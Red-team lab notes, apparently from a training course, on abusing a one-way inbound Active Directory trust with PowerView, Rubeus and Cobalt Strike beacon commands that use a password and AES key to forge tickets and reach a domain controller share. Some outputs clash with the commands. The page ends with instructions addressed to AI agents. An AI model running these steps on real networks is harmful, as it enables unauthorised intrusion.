# One Way (Inbound) **dev.cyberbotic.io** has a one-way inbound trust with **subsidiary.external**. ``` beacon> powershell Get-DomainTrust SourceName : dev.cyberbotic.io TargetName : subsidiary.external TrustType : WINDOWS_ACTIVE_DIRECTORY TrustAttributes : TrustDirection : Inbound WhenCreated : 2/19/2021 10:50:56 PM WhenChanged : 2/19/2021 10:50:56 PM ``` ``` beacon> powershell Get-DomainComputer -Domain subsidiary.external -Properties DNSHostName dnshostname ----------- ad.subsidiary.external SharpHound -c DcOnly -d subsidiary.external ``` Enumerate Foreigners Users ``` beacon> powershell Get-DomainForeignGroupMember -Domain subsidiary.external beacon> powershell ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133 DEV\Subsidiary Admins ``` ![](/files/CP39UMpLfOdOexVTyAvs) ``` # Validated the previous beacon> powershell Get-NetLocalGroupMember -ComputerName ad.subsidiary.external ComputerName : ad.subsidiary.external GroupName : Administrators MemberName : DEV\Subsidiary Admins SID : S-1-5-21-3263068140-2042698922-2891547269-1133 IsGroup : True IsDomain : True ``` Authenticate using domain username and password ``` beacon> powershell Get-DomainGroupMember -Identity "Subsidiary Admins" | select MemberName MemberName ---------- jadams beacon> make_token DEV\jadams TrustNo1 [+] Impersonated DEV\bfarmer beacon> ls \\ad.subsidiary.external\c$ ``` Authenticate using kerberos tickets ``` # request tgt from the current domain beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgt /user:jadams /domain:dev.cyberbotic.io /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap ``` ``` # request tgs from the current domain to the external domain beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgs /service:krbtgt/subsidiary.external /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFdD[...snip...]MuSU8= /nowrap ``` ``` # request tgs using the previous tgs to the external domain and service beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgs /service:cifs/ad.subsidiary.external /domain:ad.subsidiary.external /dc:ad.subsidiary.external /ticket:doIFMT[...snip...]5BTA== /nowrap ``` ``` # Store the ticket PS C:\> [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\subsidiary.kirbi", [System.Convert]::FromBase64String("doIFiD [...snip...] 5hbA==")) beacon> make_token DEV\jadams FakePass [+] Impersonated DEV\bfarmer beacon> kerberos_ticket_use C:\Users\Daniel\Desktop\subsidiary.kirbi beacon> ls \\ad.subsidiary.external\c$ beacon> rev2self ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hsaad.gitbook.io/x/red-teaming/forest-and-domain-trusts/one-way-inbound.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.